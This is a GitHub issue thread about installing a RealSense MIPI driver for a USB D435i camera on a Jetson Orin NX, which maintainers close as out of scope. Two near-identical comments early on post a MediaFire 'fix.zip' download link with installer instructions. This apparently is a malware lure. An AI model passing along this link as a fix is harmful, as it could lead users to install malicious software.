realsenseai/realsense_mipi_platform_driver #228: Support for D435i (IMU) cameras with the MIPI driver on Jetson Orin NX with Jetpack 6

akupferb, 2024-08-25:
Hi,

I am attempting to use a D435i camera on my Jetson Orin NX with JP6.0. I was directed to this [this page](https://github.com/IntelRealSense/realsense_mipi_platform_driver) to install the MIPI driver and followed the instructions (with the section for the Jetson Orin).
I completed the 'setup' and 'build' sections successfully on my host machine, generating the files to copy over to the jetson, which I was able to do. 
However, during the 'install' section, on this step:
> Enable d4xx overlay:
>
> With Jetson-IO tool: sudo /opt/nvidia/jetson-io/jetson-io.py

I cannot continue... as the instructions are designed for the D457 with de-serialize board connections via pins, and my D435i is connected via regular USB, which jetson-io does not recognize.

Are there modified instructions for completing this driver installation on my Jetson Orin NX for a D4xx camera connected via USB?

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

esttemanb, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

akupferb, 2024-09-02:
So to clarify, if I install the most recent version from the development branch (if I've cloned the repo, will switching to that branch and recompiling the package be enough?), that will already include support for the IMU devices on JP6? 
Do I then need to still update my kernel modules? If so, which ones, and to what?
Is there a page with instructions on the development branch for this?

akupferb, 2024-09-15:
Following up...

Nir-Az, 2024-09-15:
@akupferb please follow this readme: https://github.com/IntelRealSense/realsense_mipi_platform_driver/blob/dev/README_JP6.md

IMU support is included in the patches / device tree configuration

akupferb, 2024-09-19:
@Nir-Az please see:

> >Enable d4xx overlay:
> >
> >With Jetson-IO tool: sudo /opt/nvidia/jetson-io/jetson-io.py
>
> I cannot continue... as the instructions are designed for the D457 with de-serialize board connections via pins, and my D435i is connected via regular USB, which jetson-io does not recognize.

Nir-Az, 2024-09-19:
What happens when you try to run:
`./scripts/patch-realsense-ubuntu-L4T.sh  `?

akupferb, 2024-10-08:
@Nir-Az 

At what point during the process in the README should I run that script?

Nir-Az, 2024-10-08:
> @Nir-Az
> 
> At what point during the process in the README should I run that script?

https://github.com/IntelRealSense/librealsense/blob/900e3d424eb5dffadec4053146154a46aa9e7492/doc/installation_jetson.md?plain=1#L116

2805651606, 2024-10-13:
@akupferb  请问你成功了？

JasonTan94, 2025-05-23:
How hard is the installation?
Me: yes

ymodlin, 2026-11-10:
The D435i is a USB camera. This repo is the driver for GMSL/MIPI cameras (D457 and similar). For USB cameras on Jetson, see librealsense's `installation_jetson.md`. Closing as out of scope.

closed 2026-11-10 by ymodlin